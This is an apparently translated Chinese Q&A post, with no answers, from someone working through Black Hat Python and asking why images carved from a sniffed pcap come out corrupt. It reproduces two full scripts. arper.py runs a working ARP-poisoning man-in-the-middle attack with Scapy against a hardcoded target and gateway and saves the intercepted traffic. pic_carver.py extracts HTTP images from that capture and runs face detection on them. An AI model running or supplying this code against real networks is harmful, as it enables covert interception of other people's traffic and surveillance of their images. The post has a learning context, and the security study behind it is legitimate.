使用Arp Stisoning嗅探图像

时间:2015-08-15 14:06:12

标签: python opencv scapy arp

我一直在研究Black Hat Python这本书。在第四章中,有一些arp中毒和从嗅探包中提取图像的例子。我一直在尝试测试代码但是虽然我可以从我使用的虚拟机中毒和嗅探我的主机的网络流量,但我无法从生成的pcap文件中提取图像。 Wireshark可以从同一个pcap中提取图像。另一件事是,如果流量属于虚拟机而不是主机,则脚本可以成功提取pcap文件的图像。

pcap中有一些gif文件和大约十个jpeg文件。该脚本仅提取13个文件,其中10个是gif文件。我知道opencv不支持gif,但其他3个jpeg文件已损坏,并且它不会提取其余的jpeg文件。我得到像“腐败的jpeg数据”

这样的错误

apper.py

    from scapy.all import *
    import os
    import sys
    import threading

    interface    = "en1"
    target_ip    = "172.16.1.71"
    gateway_ip   = "172.16.1.254"
    packet_count = 1000
    poisoning    = True

    def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):

        # slightly different method using send
        print "[*] Restoring target..."
        send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
        send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)

    def get_mac(ip_address):

        responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)

        # return the MAC address from a response
        for s,r in responses:
            return r[Ether].src

        return None

    def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
        global poisoning

        poison_target = ARP()
        poison_target.op   = 2
        poison_target.psrc = gateway_ip
        poison_target.pdst = target_ip
        poison_target.hwdst= target_mac

        poison_gateway = ARP()
        poison_gateway.op   = 2
        poison_gateway.psrc = target_ip
        poison_gateway.pdst = gateway_ip
        poison_gateway.hwdst= gateway_mac

        print "[*] Beginning the ARP poison. [CTRL-C to stop]"

        while poisoning:
            send(poison_target)
            send(poison_gateway)

            time.sleep(2)

        print "[*] ARP poison attack finished."

        return

    # set our interface
    conf.iface = interface

    # turn off output
    conf.verb  = 0

    print "[*] Setting up %s" % interface

    gateway_mac = get_mac(gateway_ip)

    if gateway_mac is None:
        print "[!!!] Failed to get gateway MAC. Exiting."
        sys.exit(0)
    else:
        print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

    target_mac = get_mac(target_ip)

    if target_mac is None:
        print "[!!!] Failed to get target MAC. Exiting."
        sys.exit(0)
    else:
        print "[*] Target %s is at %s" % (target_ip,target_mac)

    # start poison thread
    poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
    poison_thread.start()

    try:
        print "[*] Starting sniffer for %d packets" % packet_count

        bpf_filter  = "ip host %s" % target_ip
        packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)

    except KeyboardInterrupt:
        pass

    finally:
        # write out the captured packets
        print "[*] Writing packets to arper.pcap"
        wrpcap('arper.pcap',packets)

        poisoning = False

        # wait for poisoning thread to exit
        time.sleep(2)

        # restore the network
        restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
        sys.exit(0)

pic_carver.py

import re
import zlib
import cv2

from scapy.all import *

pictures_directory = "pic_carver/pictures"
faces_directory    = "pic_carver/faces"
pcap_file          = "bhp.pcap"

def face_detect(path,file_name):

        img     = cv2.imread(path)
        cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
        rects   = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

        if len(rects) == 0:
                return False

        rects[:, 2:] += rects[:, :2]

    # highlight the faces in the image        
    for x1,y1,x2,y2 in rects:
        cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)

    cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)

        return True

def get_http_headers(http_payload):

    try:
        # split the headers off if it is HTTP traffic
        headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]

        # break out the headers
        headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
    except:
        return None

    if "Content-Type" not in headers:
        return None

    return headers

def extract_image(headers,http_payload):

    image      = None
    image_type = None

    try:
        if "image" in headers['Content-Type']:

            # grab the image type and image body
            image_type = headers['Content-Type'].split("/")[1]

            image = http_payload[http_payload.index("\r\n\r\n")+4:]

            # if we detect compression decompress the image
            try:
                if "Content-Encoding" in headers.keys():
                    if headers['Content-Encoding'] == "gzip":
                        image = zlib.decompress(image,16+zlib.MAX_WBITS)
                    elif headers['Content-Encoding'] == "deflate":
                        image = zlib.decompress(image)
            except:
                pass    
    except:
        return None,None

    return image,image_type

def http_assembler(pcap_file):

    carved_images   = 0
    faces_detected  = 0

    a = rdpcap(pcap_file)

    sessions      = a.sessions()    

    for session in sessions:

        http_payload = ""

        for packet in sessions[session]:

            try:
                if packet[TCP].dport == 80 or packet[TCP].sport == 80:

                    # reassemble the stream into a single buffer
                    http_payload += str(packet[TCP].payload)

            except:
                pass

        headers = get_http_headers(http_payload)

        if headers is None:
            continue

        image,image_type = extract_image(headers,http_payload)

        if image is not None and image_type is not None:                

            # store the image
            file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)
            fd = open("%s/%s" % (pictures_directory,file_name),"wb")
            fd.write(image)
            fd.close()

            carved_images += 1

            # now attempt face detection
            try:
                result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)

                if result is True:
                    faces_detected += 1
            except:
                pass


    return carved_images, faces_detected


carved_images, faces_detected = http_assembler(pcap_file)

print "Extracted: %d images" % carved_images
print "Detected: %d faces" % faces_detected

0 个答案:

没有答案